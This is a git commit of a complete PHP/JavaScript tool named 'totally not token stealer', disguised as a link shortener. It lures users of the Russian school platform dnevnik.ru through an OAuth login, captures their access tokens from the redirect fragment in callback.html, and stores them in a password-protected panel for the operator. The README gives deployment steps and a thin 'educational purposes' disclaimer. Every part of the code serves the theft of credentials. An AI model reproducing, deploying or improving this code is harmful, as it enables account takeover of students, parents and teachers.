initial
Some checks failed
Build and Release / build-and-release (push) Failing after 8s

This commit is contained in:
2026-05-28 15:03:31 +03:00
commit ce0d14bd77
9 changed files with 1537 additions and 0 deletions

37
.github/workflows/build.yml vendored Normal file
View File

@@ -0,0 +1,37 @@
name: Build and Release
on:
push:
branches:
- main
jobs:
build-and-release:
runs-on: ubuntu-latest
steps:
- name: Checkout repository
uses: actions/checkout@v4
- name: Set up Bun
uses: oven-sh/setup-bun@v2
with:
bun-version: latest
- name: Run builder
run: bun run builder.js
- name: Rename output
run: mv output.php totallynottokenstealer.php
- name: Generate release tag
id: tag
run: echo "tag=release-$(date +'%Y%m%d%H%M%S')" >> $GITHUB_OUTPUT
- name: Create release with artifact
uses: actions/gitea-release-action@v1
with:
token: ${{ secrets.GITHUB_TOKEN }}
tag_name: ${{ steps.tag.outputs.tag }}
release_name: "Release ${{ steps.tag.outputs.tag }}"
files: totallynottokenstealer.php

2
.gitignore vendored Normal file
View File

@@ -0,0 +1,2 @@
totallynotstealeddata.*
output.php

34
README.md Normal file
View File

@@ -0,0 +1,34 @@
![header](https://assets.ktkz.ru/tnts/h.png)
# totally not token stealer
## утилита **для сокращения ссылок** чтобы **НЕ** красть токены с дневника ру
---
## КАК **НЕ** УСТАНОВИТЬ
1. скачай `totallynottokenstealer.php` с Releases
2. выгрузи файл на любой php-хостинг
3. переименуй как душе угодно _(главное оставь расширение `.php`)_
4. поменяй пароль от панели в `PANEL_PASSWORD`
5. **готово!** панель открывается при помощи `?control` в url (по типу `example.com/example.php?control`)
---
![screenshoot](https://assets.ktkz.ru/tnts/s.png)
---
## КАК **НЕ** БИЛДИТЬ
- используй `node ./builder.js` или какой раннер js вы там юзаете
- для **DEV** режима `node ./bulder.js --dev`
- дальше можно запустить встроеный `php -S localhost:8080` или что вам там нужно
---
> [!CAUTION]
> Я **НЕ НЕСУ ОТВЕТСТВЕННОСТИ** ЗА ТО, КАК ВЫ БУДЕТЕ ИСПОЛЬЗОВАТЬ ЭТО ПО.
> ОНО БЫЛО СОЗДАННО ИСКЛЮЧИТЕЛЬНО **В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ**, И ДЕМОНСТРИРУЕТ ОТСУТСТВИЕ ЗАЩИТЫ ДНЕВНИКА.РУ.
> **НЕ ЗЛОУПОТРЕБЛЯЙТЕ ИМ!!**

94
builder.js Normal file
View File

@@ -0,0 +1,94 @@
// ai slop
import fs from "node:fs";
import path from "node:path";
const DEV = process.argv.includes("--dev");
const escape = (str) =>
str
.replace(/\s+/g, " ")
.trim()
.replace(/"/g, '\\"')
.replace(/\$/g, "\\$");
function build() {
const data = fs.readFileSync("./script.php", "utf8");
const mountRegex = /"<<BUILDER_MOUNT_FILE_\((?<file>.*?)\)>>"/gm;
const mountedFiles = new Set();
const result = data.replace(mountRegex, (_match, file) => {
let fileContent = fs.readFileSync(file, "utf8");
mountedFiles.add(path.resolve(file));
const inlinePhpVarRegex = /"<<BUILDER_PHP_VAR\((?<varName>.*?)\)>>"/g;
const vars = [];
let varMatch;
while ((varMatch = inlinePhpVarRegex.exec(fileContent)) !== null) {
vars.push({
escapedPlaceholder: escape(varMatch[0]),
varName: varMatch.groups.varName,
});
}
fileContent = escape(fileContent);
for (const { escapedPlaceholder, varName } of vars) {
fileContent = fileContent.replace(
escapedPlaceholder,
`" . ${varName} . "`
);
}
return `"${fileContent}"`;
});
fs.writeFileSync("./output.php", result, "utf8");
console.log(`[${new Date().toLocaleTimeString()}] Built output.php`);
return mountedFiles;
}
// Run once immediately
let watchedFiles = build();
if (DEV) {
const watchers = new Map(); // path → FSWatcher
function watchFile(file) {
if (watchers.has(file)) return;
const watcher = fs.watch(file, () => {
console.log(`[${new Date().toLocaleTimeString()}] Changed: ${path.relative(".", file)}`);
rebuild();
});
watchers.set(file, watcher);
}
function syncWatchers(current) {
// Watch any newly mounted files
for (const file of current) watchFile(file);
// Stop watching files that are no longer mounted
for (const [file, watcher] of watchers) {
if (!current.has(file) && file !== path.resolve("./script.php")) {
watcher.close();
watchers.delete(file);
}
}
}
function rebuild() {
try {
watchedFiles = build();
syncWatchers(watchedFiles);
} catch (err) {
console.error("Build error:", err.message);
}
}
// Always watch the entry file
watchFile(path.resolve("./script.php"));
syncWatchers(watchedFiles);
console.log("Watching for changes… (Ctrl+C to stop)");
}

24
dev/html/callback.html Normal file
View File

@@ -0,0 +1,24 @@
<!doctype html>
<html>
<head> </head>
<body>
<script>
const redirect_url = `"<<BUILDER_PHP_VAR($redirect_url)>>"`;
const send_url = `"<<BUILDER_PHP_VAR($send_url)>>"`;
const href = location.hash;
const token = location.hash.substring(
href.indexOf("access_token=") + 13,
href.indexOf("&"),
);
if (!token) {
window.location.href = redirect_url;
}
fetch(send_url + "&token=" + encodeURIComponent(token)).then(
(response) => {
window.location.href = redirect_url;
},
);
</script>
</body>
</html>

611
dev/html/control.html Normal file
View File

@@ -0,0 +1,611 @@
<!-- half ai slop -->
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>control</title>
<link rel="preconnect" href="https://fonts.googleapis.com" />
<script src="https://unpkg.com/lucide@latest/dist/umd/lucide.js"></script>
<link
href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500;700;800&display=swap"
rel="stylesheet"
/>
<style>
*,
*::before,
*::after {
box-sizing: border-box;
padding: 0;
margin: 0;
}
[k-template] {
display: none;
}
:root {
--bg: #0d0d0f;
--surface: #131316;
--surface2: #1a1a1f;
--border: rgba(255, 255, 255, 0.06);
--border-bright: rgba(255, 255, 255, 0.14);
--text: #ffffff;
--muted: #d3d3dd;
--too-muted: #84848f;
--blue: #4f8ef7;
--blue-dim: rgba(79, 142, 247, 0.12);
--green: #3ecf8e;
--green-dim: rgba(62, 207, 142, 0.12);
--red: #f76f6f;
--red-dim: rgba(247, 111, 111, 0.12);
}
body {
font-family: "JetBrains Mono", monospace;
background: var(--bg);
color: var(--text);
min-height: 100vh;
}
.shell {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 2rem 1rem;
}
.card {
width: 100%;
max-width: 820px;
background: var(--surface);
border: 1px solid var(--border-bright);
border-radius: 12px;
overflow: hidden;
box-shadow:
0 0 0 1px rgba(0, 0, 0, 0.5),
0 24px 64px rgba(0, 0, 0, 0.6);
}
.titlebar {
background: var(--surface2);
border-bottom: 1px solid var(--border-bright);
padding: 12px 18px;
display: flex;
align-items: center;
gap: 12px;
position: relative;
}
.dots {
display: flex;
gap: 6px;
}
.dot {
width: 11px;
height: 11px;
border-radius: 50%;
}
.dot-r {
background: #f76f6f;
}
.dot-y {
background: #f5c842;
}
.dot-g {
background: #3ecf8e;
}
.titlebar-name {
font-size: 17px;
font-weight: 800;
color: var(--text);
margin-left: 20px;
margin-right: auto;
}
.titlebar-by {
position: absolute;
right: 20px;
height: 30px;
}
.card-body {
padding: 24px;
display: flex;
flex-direction: column;
gap: 24px;
}
.section-label {
display: flex;
align-items: center;
gap: 8px;
font-size: 10px;
font-weight: 700;
letter-spacing: 0.15em;
text-transform: uppercase;
color: var(--muted);
margin-bottom: 10px;
}
.section-label .pulse-dot {
width: 7px;
height: 7px;
border-radius: 50%;
flex-shrink: 0;
}
.pulse-dot.blue {
background: var(--blue);
animation: pulse 2s ease-in-out infinite;
}
.pulse-dot.green {
background: var(--green);
animation: pulse 2s ease-in-out infinite 0.4s;
}
@keyframes pulse {
0%,
100% {
opacity: 1;
box-shadow: 0 0 0 0 currentColor;
}
50% {
opacity: 0.6;
}
}
.error-area p {
font-size: 12px;
color: var(--red);
background: var(--red-dim);
border: 1px solid rgba(247, 111, 111, 0.25);
border-radius: 6px;
padding: 8px 14px;
text-align: center;
}
.create-form {
display: grid;
grid-template-columns: 1.5fr 2fr;
gap: 8px;
}
.create-form textarea {
grid-column: 1 / -1;
}
.create-form .btn-row {
grid-column: 1 / -1;
display: flex;
justify-content: flex-end;
}
.field {
background: var(--bg);
border: 1px solid var(--border-bright);
border-radius: 6px;
padding: 8px 12px;
color: var(--text);
font-family: inherit;
font-size: 12px;
outline: none;
transition:
border-color 0.15s,
box-shadow 0.15s;
width: 100%;
}
.field::placeholder {
color: var(--too-muted);
}
.field:focus {
border-color: var(--blue);
box-shadow: 0 0 0 3px var(--blue-dim);
}
textarea.field {
resize: none;
min-height: 68px;
}
.btn-add {
display: flex;
align-items: center;
gap: 6px;
background: var(--blue);
color: #fff;
font-family: inherit;
font-size: 11px;
font-weight: 700;
letter-spacing: 0.08em;
border: none;
border-radius: 6px;
padding: 7px 14px;
cursor: pointer;
transition:
background 0.15s,
transform 0.1s;
}
.btn-add:hover {
background: #6aa3ff;
}
.btn-add:active {
transform: scale(0.97);
}
.tbl-wrap {
overflow-x: auto;
border-radius: 8px;
border: 1px solid var(--border);
}
table {
width: 100%;
border-collapse: collapse;
font-size: 12px;
}
thead {
background: var(--surface2);
}
thead th {
padding: 9px 14px;
text-align: left;
font-size: 10px;
font-weight: 700;
letter-spacing: 0.12em;
text-transform: uppercase;
color: var(--muted);
border-bottom: 1px solid var(--border-bright);
white-space: nowrap;
}
tbody tr {
border-bottom: 1px solid var(--border);
transition: background 0.1s;
}
tbody tr:last-child {
border-bottom: none;
}
tbody tr:hover {
background: rgba(255, 255, 255, 0.025);
}
tbody td {
padding: 10px 14px;
color: var(--text);
vertical-align: middle;
}
tbody td a {
color: var(--blue);
text-decoration: none;
font-size: 11px;
}
tbody td a:hover {
text-decoration: underline;
}
.row-actions {
display: flex;
gap: 6px;
}
.action-btn {
min-width: 28px;
padding: 0 6px;
height: 28px;
border-radius: 5px;
border: 1px solid var(--border-bright);
display: flex;
align-items: center;
justify-content: center;
cursor: pointer;
transition:
background 0.15s,
border-color 0.15s;
flex-shrink: 0;
}
.action-btn.copy {
background: var(--green-dim);
border-color: rgba(62, 207, 142, 0.25);
color: var(--green);
}
.action-btn.copy:hover {
background: rgba(62, 207, 142, 0.22);
}
.action-btn.copy.alt {
background: var(--blue-dim);
border-color: rgba(62, 107, 242, 0.25);
color: var(--blue);
}
.action-btn.copy.alt:hover {
background: rgba(62, 107, 242, 0.22);
}
.action-btn.del {
background: var(--red-dim);
border-color: rgba(247, 111, 111, 0.25);
color: var(--red);
}
.action-btn.del:hover {
background: rgba(247, 111, 111, 0.22);
}
.token-badge {
font-size: 10px;
background: var(--green-dim);
color: var(--green);
border: 1px solid rgba(62, 207, 142, 0.2);
border-radius: 4px;
padding: 2px 7px;
letter-spacing: 0.04em;
max-width: 160px;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
display: inline-block;
}
.empty-row td {
text-align: center;
color: var(--muted);
padding: 24px;
font-size: 11px;
letter-spacing: 0.06em;
}
.token-hide {
color: transparent;
background: linear-gradient(to right, #fff 15%, transparent 60%);
background-clip: text;
transition: background 0.3s;
}
.token-hide:hover,
tr:has(.token-hide):hover .token-hide {
background-color: #fff;
}
.err {
gap: 2px;
display: flex;
align-items: center;
justify-content: center;
}
</style>
</head>
<body>
<div k-template id="t_login">
<input type="hidden" name="l" value="{{l}}" />
</div>
<div id="t_error" k-template>
<p class="text-red-500 text-center err">
<i data-lucide="x_circle" height="14"></i>{{error}}
</p>
</div>
<div k-template id="t_active_row">
<template-tr>
<template-td>{{name}}</template-td>
<template-td>{{comment}}</template-td>
<template-td
><a class="text-blue-300" href="{{url}}">{{url}}</a></template-td
>
<template-td>
<div class="row-actions">
<div class="action-btn copy" onclick="copy_link('{{name}}')">
<i data-lucide="copy" height="14"></i>
link
</div>
<div class="action-btn del" onclick="delete_link('{{name}}')">
<i data-lucide="trash" height="14"></i>
</div>
</div>
</template-td>
</template-tr>
</div>
<div k-template id="t_complete_row">
<template-tr>
<template-td>{{name}}</template-td>
<template-td class="token-hide">{{token}}</template-td>
<template-td>{{comment}}</template-td>
<template-td
><a class="text-blue-300" href="{{url}}">{{url}}</a></template-td
>
<template-td>
<div class="row-actions">
<div class="action-btn copy alt" onclick="copy('{{token}}')">
<i data-lucide="copy" height="14"></i>
token
</div>
<div class="action-btn copy" onclick="copy_link('{{name}}')">
<i data-lucide="copy" height="14"></i>
link
</div>
<div class="action-btn del" onclick="delete_link('{{name}}')">
<i data-lucide="trash" height="14"></i>
</div>
</div>
</template-td>
</template-tr>
</div>
<div class="shell">
<div class="card">
<div class="titlebar">
<div class="dots">
<span class="dot dot-r"></span>
<span class="dot dot-y"></span>
<span class="dot dot-g"></span>
</div>
<span class="titlebar-name">totally not token stealer</span>
<img
src="https://assets.ktkz.ru/ktkzXtmb.svg"
alt=""
class="titlebar-by"
/>
</div>
<div class="card-body">
<div class="error-area" k-m-error></div>
<div>
<div class="section-label">
<i data-lucide="plus-circle" width="13" height="13"></i>
create new entry
</div>
<form class="create-form" action="" method="get">
<input type="hidden" name="control" value="" />
<template k-login></template>
<input type="hidden" name="do" value="create" />
<input
class="field"
type="text"
name="name"
k-link-name-format
placeholder="link name e.g. homework => (?go=homework)"
required
/>
<input
class="field"
type="text"
name="url"
placeholder="redirect URL e.g. https://example.com"
required
/>
<textarea
class="field"
name="comment"
placeholder="comment for you (optional)"
></textarea>
<div class="btn-row">
<button type="submit" class="btn-add">
<i data-lucide="plus" width="13" height="13"></i>
Add entry
</button>
</div>
</form>
</div>
<!-- Active -->
<div>
<div class="section-label">
<span class="pulse-dot blue"></span>
active
</div>
<div class="tbl-wrap">
<table>
<thead>
<tr>
<th>name</th>
<th>comment</th>
<th>url</th>
<th></th>
</tr>
</thead>
<tbody k-m-active>
<!-- empty placeholder (script will clear this) -->
<tr class="empty-row">
<td colspan="4">no active entries</td>
</tr>
</tbody>
</table>
</div>
</div>
<div>
<div class="section-label">
<span class="pulse-dot green"></span>
completed
</div>
<div class="tbl-wrap">
<table>
<thead>
<tr>
<th>name</th>
<th>token</th>
<th>comment</th>
<th>url</th>
<th></th>
</tr>
</thead>
<tbody k-m-completed>
<tr class="empty-row">
<td colspan="5">no completed entries</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
<script>
lucide.createIcons();
</script>
</body>
<script>
/** @param {{error?: string; password: string; data: {name: string; url: string; comment: string; token: string | null}[] }} data */
const appendData = (data) => {
if (data.error) {
document.querySelector("[k-m-error]").innerHTML = renderTemplate(
"error",
data,
);
}
document.querySelectorAll("[k-login]").forEach((a) => {
a.outerHTML = renderTemplate("login", { l: data.password });
});
window.__password = data.password;
if (data.data) {
let completedBlocks = [];
let activeBlocks = [];
data.data.forEach((item) => {
if (!!item.token) {
completedBlocks.push(renderTemplate("complete_row", item));
} else {
activeBlocks.push(
renderTemplate("active_row", {
name: item.name,
url: item.url,
comment: item.comment,
}),
);
}
});
if (completedBlocks.length > 0)
document.querySelector("[k-m-completed]").innerHTML =
completedBlocks.join("");
if (activeBlocks.length > 0)
document.querySelector("[k-m-active]").innerHTML =
activeBlocks.join("");
}
};
/** @param {string} name
* @param {object} values
*/
const renderTemplate = (name, values) => {
const el = document.querySelector(`[k-template]#t_${name}`);
if (!el) {
throw `k-template ${name} not found`;
return;
}
let d = el.innerHTML;
Object.keys(values).forEach((i) => {
d = d.split(`{{${i}}}`).join(values[i].toString());
});
d = d.split(`template-`).join("");
return d;
};
window["_appendData"] = appendData;
</script>
<script>
function copy_link(link) {
const url =
location.href.substring(0, location.href.indexOf("?")) + `?go=${link}`;
navigator.clipboard.writeText(url);
alert("Link copied to clipboard");
}
function delete_link(link) {
if (!window.__password) {
console.error("no window password");
return;
}
if (!confirm("Are you sure you want to delete this link?")) return;
location.href =
location.href.substring(0, location.href.indexOf("?")) +
`?l=${window.__password}&do=delete&delete=${link}`;
}
function copy(text) {
navigator.clipboard.writeText(text);
alert("Token copied to clipboard");
}
</script>
<script>
window._appendData("<<BUILDER_PHP_VAR($data)>>");
</script>
</html>

249
dev/html/login.html Normal file
View File

@@ -0,0 +1,249 @@
<!-- half ai slop -->
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Document</title>
<style>
*,
*::before,
*::after {
box-sizing: border-box;
margin: 0;
padding: 0;
}
[k-template] {
display: none;
}
:root {
--bg: #0d0d0f;
--surface: #131316;
--surface2: #1a1a1f;
--border: rgba(255, 255, 255, 0.06);
--border-bright: rgba(255, 255, 255, 0.14);
--text: #ffffff;
--muted: #d3d3dd;
--too-muted: #84848f;
--blue: #4f8ef7;
--blue-dim: rgba(79, 142, 247, 0.12);
--green: #3ecf8e;
--green-dim: rgba(62, 207, 142, 0.12);
--red: #f76f6f;
--red-dim: rgba(247, 111, 111, 0.12);
}
body {
font-family: "JetBrains Mono", monospace;
background: var(--bg);
color: var(--text);
min-height: 100vh;
}
.shell {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 2rem 1rem;
}
.card {
width: 100%;
max-width: 820px;
background: var(--surface);
border: 1px solid var(--border-bright);
border-radius: 12px;
overflow: hidden;
box-shadow:
0 0 0 1px rgba(0, 0, 0, 0.5),
0 24px 64px rgba(0, 0, 0, 0.6);
}
.titlebar {
background: var(--surface2);
border-bottom: 1px solid var(--border-bright);
padding: 12px 18px;
display: flex;
align-items: center;
gap: 12px;
position: relative;
}
.dots {
display: flex;
gap: 6px;
}
.dot {
width: 11px;
height: 11px;
border-radius: 50%;
}
.dot-r {
background: #f76f6f;
}
.dot-y {
background: #f5c842;
}
.dot-g {
background: #3ecf8e;
}
.titlebar-name {
font-size: 17px;
font-weight: 800;
color: var(--text);
margin-left: 20px;
margin-right: auto;
}
.titlebar-by {
position: absolute;
right: 20px;
height: 30px;
}
.card-body {
padding: 24px;
display: flex;
flex-direction: column;
gap: 24px;
}
.error-area p {
font-size: 12px;
color: var(--red);
background: var(--red-dim);
border: 1px solid rgba(247, 111, 111, 0.25);
border-radius: 6px;
padding: 8px 14px;
text-align: center;
}
.field {
background: var(--bg);
border: 1px solid var(--border-bright);
border-radius: 6px;
padding: 8px 12px;
color: var(--text);
font-family: inherit;
font-size: 12px;
outline: none;
transition:
border-color 0.15s,
box-shadow 0.15s;
width: 100%;
}
.field::placeholder {
color: var(--too-muted);
}
.field:focus {
border-color: var(--blue);
box-shadow: 0 0 0 3px var(--blue-dim);
}
textarea.field {
resize: none;
min-height: 68px;
}
.btn-add {
display: flex;
align-items: center;
gap: 6px;
background: var(--blue);
color: #fff;
font-family: inherit;
font-size: 11px;
font-weight: 700;
letter-spacing: 0.08em;
border: none;
border-radius: 6px;
padding: 7px 14px;
cursor: pointer;
transition:
background 0.15s,
transform 0.1s;
}
.btn-add:hover {
background: #6aa3ff;
}
.btn-add:active {
transform: scale(0.97);
}
.form{
display: flex;
align-items: center;
justify-content: center;
max-width: 600px;
gap: 6px;
}
</style>
</head>
<body>
<div id="t_error" k-template>
<p class="text-red-500 text-center">{{error}}</p>
</div>
<div class="shell">
<div class="card">
<div class="titlebar">
<div class="dots">
<span class="dot dot-r"></span>
<span class="dot dot-y"></span>
<span class="dot dot-g"></span>
</div>
<span class="titlebar-name">totally not token stealer</span>
<img src="https://assets.ktkz.ru/ktkzXtmb.svg" alt="" class="titlebar-by">
</div>
<div class="card-body">
<h2 class="text-xl">login</h2>
<form
class="form"
action=""
method="get"
>
<div k-m-error class="error-area"></div>
<input type="hidden" name="control" />
<input
type="password"
class="field"
name="l"
placeholder="password should be here"
/>
<button class="btn-add">login</button>
</form>
</div>
</div>
<script>
/** @param {{error?: string}} data */
const appendData = (data) => {
if (data.error) {
document.querySelector("[k-m-error]").innerHTML = renderTemplate(
"error",
data,
);
}
};
/** @param {string} name
* @param {object} values
*/
const renderTemplate = (name, values) => {
const el = document.querySelector(`[k-template]#t_${name}`);
if (!el) return;
let d = el.innerHTML;
Object.keys(values).forEach((i) => {
d = d.split(`{{${i}}}`).join(values[i].toString());
});
return d;
};
window["_appendData"] = appendData;
</script>
<script>window._appendData("<<BUILDER_PHP_VAR($data)>>")</script>
</body>
</html>

243
dev/html/logos.html Normal file
View File

@@ -0,0 +1,243 @@
<!--
half ai slop
entire html just to screenshot
p.s.
— I love you, Саша
— Я тебя также
— Ты ведь хочешь?
— Даже очень!
-->
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Document</title>
<style>
*,
*::before,
*::after {
box-sizing: border-box;
margin: 0;
padding: 0;
}
[k-template] {
display: none;
}
:root {
--bg: #0d0d0f;
--surface: #131316;
--surface2: #1a1a1f;
--border: rgba(255, 255, 255, 0.06);
--border-bright: rgba(255, 255, 255, 0.14);
--text: #ffffff;
--muted: #d3d3dd;
--too-muted: #84848f;
--blue: #4f8ef7;
--blue-dim: rgba(79, 142, 247, 0.12);
--green: #3ecf8e;
--green-dim: rgba(62, 207, 142, 0.12);
--red: #f76f6f;
--red-dim: rgba(247, 111, 111, 0.12);
}
body {
font-family: "JetBrains Mono", monospace;
background: var(--bg);
color: var(--text);
min-height: 100vh;
}
.shell {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 2rem 1rem;
}
.card {
width: 100%;
max-width: 500px;
background: var(--surface);
border: 1px solid var(--border-bright);
border-radius: 12px;
overflow: hidden;
box-shadow:
0 0 0 1px rgba(0, 0, 0, 0.5),
0 24px 64px rgba(0, 0, 0, 0.6);
}
.titlebar {
background: var(--surface2);
border-bottom: 1px solid var(--border-bright);
padding: 12px 18px;
display: flex;
align-items: center;
gap: 12px;
position: relative;
}
.dots {
display: flex;
gap: 6px;
}
.dot {
width: 11px;
height: 11px;
border-radius: 50%;
}
.dot-r {
background: #f76f6f;
}
.dot-y {
background: #f5c842;
}
.dot-g {
background: #3ecf8e;
}
.titlebar-name {
font-size: 17px;
font-weight: 800;
color: var(--text);
margin-left: 20px;
margin-right: auto;
}
.titlebar-by {
position: absolute;
right: 20px;
height: 30px;
}
.card-body {
padding: 24px;
display: flex;
flex-direction: column;
gap: 24px;
}
.error-area p {
font-size: 12px;
color: var(--red);
background: var(--red-dim);
border: 1px solid rgba(247, 111, 111, 0.25);
border-radius: 6px;
padding: 8px 14px;
text-align: center;
}
.field {
background: var(--bg);
border: 1px solid var(--border-bright);
border-radius: 6px;
padding: 8px 12px;
color: var(--text);
font-family: inherit;
font-size: 12px;
outline: none;
transition:
border-color 0.15s,
box-shadow 0.15s;
width: 100%;
}
.field::placeholder {
color: var(--too-muted);
}
.field:focus {
border-color: var(--blue);
box-shadow: 0 0 0 3px var(--blue-dim);
}
textarea.field {
resize: none;
min-height: 68px;
}
.btn-add {
display: flex;
align-items: center;
gap: 6px;
background: var(--blue);
color: #fff;
font-family: inherit;
font-size: 11px;
font-weight: 700;
letter-spacing: 0.08em;
border: none;
border-radius: 6px;
padding: 7px 14px;
cursor: pointer;
transition:
background 0.15s,
transform 0.1s;
}
.btn-add:hover {
background: #6aa3ff;
}
.btn-add:active {
transform: scale(0.97);
}
.form{
display: flex;
align-items: center;
justify-content: center;
max-width: 600px;
gap: 6px;
}
</style>
</head>
<body>
<div id="t_error" k-template>
<p class="text-red-500 text-center">{{error}}</p>
</div>
<div class="shell">
<div class="card">
<div class="titlebar">
<div class="dots">
<span class="dot dot-r"></span>
<span class="dot dot-y"></span>
<span class="dot dot-g"></span>
</div>
<img src="https://assets.ktkz.ru/ktkzXtmb.svg" alt="" class="titlebar-by">
</div>
<div class="card-body">
<span class="titlebar-name">totally not token stealer</span>
</div>
</div>
<script>
/** @param {{error?: string}} data */
const appendData = (data) => {
if (data.error) {
document.querySelector("[k-m-error]").innerHTML = renderTemplate(
"error",
data,
);
}
};
/** @param {string} name
* @param {object} values
*/
const renderTemplate = (name, values) => {
const el = document.querySelector(`[k-template]#t_${name}`);
if (!el) return;
let d = el.innerHTML;
Object.keys(values).forEach((i) => {
d = d.split(`{{${i}}}`).join(values[i].toString());
});
return d;
};
window["_appendData"] = appendData;
</script>
<script>window._appendData("<<BUILDER_PHP_VAR($data)>>")</script>
</body>
</html>

243
script.php Normal file
View File

@@ -0,0 +1,243 @@
<?php
// totally not token stealer
// for dnevnik.ru
// =========================
// by ktkz for tmb project
// 2026
// go to .php?control to open control panel
// ===CONFIG===
const PANEL_PASSWORD = "TOTALLYNOTSTEALERpassword1";
const DATA_FILE_PATH = "./totallynotstealeddata.php";
const AUTH_URL = "https://login.dnevnik.ru/login/?ReturnUrl=";
const OAUTH_URL = "https://login.dnevnik.ru/oauth2?response_type=token&client_id=b8006d75-70a9-4291-885c-13d8511bb2ae&scope=CommonInfo,EducationalInfo,FriendsAndRelatives&redirect_uri=";
// ============
// ===PAGES===
// NOTE: contains ai-generated styles and mine shitty while state-of-art template system
// we use builder to mount these
function LOGIN_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\login.html)>>";
}
function CONTROL_PAGE(string $data)
{
return "<<BUILDER_MOUNT_FILE_(.\dev\html\control.html)>>";
}
// ===========
// PREPARATION
if (!file_exists(DATA_FILE_PATH)) {
file_put_contents(
DATA_FILE_PATH,
'<?php // { "name": "tnts", "version": 1, "data": [] }',
);
}
// ROUTER
function path(string $p)
{
return count($_GET) > 0 && array_keys($_GET)[0] == $p;
}
if (path("control")) {
if (!isset($_GET["l"]) || $_GET["l"] == "") {
echo LOGIN_PAGE("{}");
exit();
}
if ($_GET["l"] != PANEL_PASSWORD) {
echo LOGIN_PAGE('{error: "wrong password"}');
exit();
}
// user authorized
if (!in_array("do", array_keys($_GET))) {
$config = readConfig();
$error = "";
if (isset($_GET["error"])) {
$error = $_GET["error"];
}
echo CONTROL_PAGE(
json_encode([
"password" => $_GET["l"],
"data" => $config,
"error" => $error,
]),
);
exit();
}
}
function readConfig()
{
$_ = json_decode(
str_replace("<?php // ", "", file_get_contents(DATA_FILE_PATH)),
true,
);
if ($_["name"] != "tnts" || !isset($_["data"])) {
exit();
}
return $_["data"];
}
function saveConfig(array $config)
{
$_ = ["name" => "tnts", "version" => 1, "data" => $config];
file_put_contents(DATA_FILE_PATH, "<?php // " . json_encode($_));
}
// config type
// {
// {
// "name": string,
// "url": string,
// "comment": string?,
// "token": string?
// }
// }
//
// define status by token presence
if (
isset($_GET["do"]) &&
$_GET["do"] === "create" &&
isset($_GET["url"]) &&
isset($_GET["name"])
) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
// create link
$url = $_GET["url"];
$name = $_GET["name"];
$comment = $_GET["comment"] ?? null;
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] === $name,
),
);
if (count($matches) != 0) {
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"] .
"&error=" .
urlencode("url already exists"),
true,
302,
);
exit();
}
$config[] = [
"name" => $name,
"url" => $url,
"comment" => $comment,
"token" => null,
];
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
}
if (isset($_GET["do"]) && $_GET["do"] === "delete" && isset($_GET["delete"])) {
if (!isset($_GET["l"]) || $_GET["l"] == "" || $_GET["l"] != PANEL_PASSWORD) {
exit();
}
$name = $_GET["delete"];
$config = readConfig();
$config = array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] != $name,
);
saveConfig($config);
header(
"Location: " .
parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH) .
"?control&l=" .
$_GET["l"],
true,
302,
);
exit();
}
function getBaseUrl(): string
{
$scheme =
!empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http";
$host = $_SERVER["HTTP_HOST"] ?? ($_SERVER["SERVER_NAME"] ?? "");
$script = $_SERVER["SCRIPT_NAME"] ?? ($_SERVER["PHP_SELF"] ?? "");
return $scheme . "://" . $host . $script;
}
if (isset($_GET["go"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["go"],
),
);
if (count($matches) == 0) {
exit();
}
$goUrl = getBaseUrl() . "?callback&name=" . $_GET["go"];
$redirect = AUTH_URL . rawurlencode(OAUTH_URL . rawurlencode($goUrl));
header("Location: " . $redirect, true, 302);
exit();
}
if (path("info")) {
header("Content-type: application/json");
echo json_encode([
"name" => "totally not token stealer",
"version" => "1.0.0",
"author" => "ktkz",
]);
}
if (path("callback") && isset($_GET["name"])) {
$base = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH);
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$send_url = $base . "?send&name=" . $_GET["name"];
$redirect_url = $matches[0]["url"];
echo "<<BUILDER_MOUNT_FILE_(.\dev\html\callback.html)>>";
exit();
}
if (path("send") && isset($_GET["name"]) && isset($_GET["token"])) {
$config = readConfig();
$matches = array_values(
array_filter(
$config,
fn($item) => isset($item["name"]) && $item["name"] == $_GET["name"],
),
);
if (count($matches) == 0) {
exit();
}
$config[array_search($matches[0], $config)]["token"] = $_GET["token"];
saveConfig($config);
}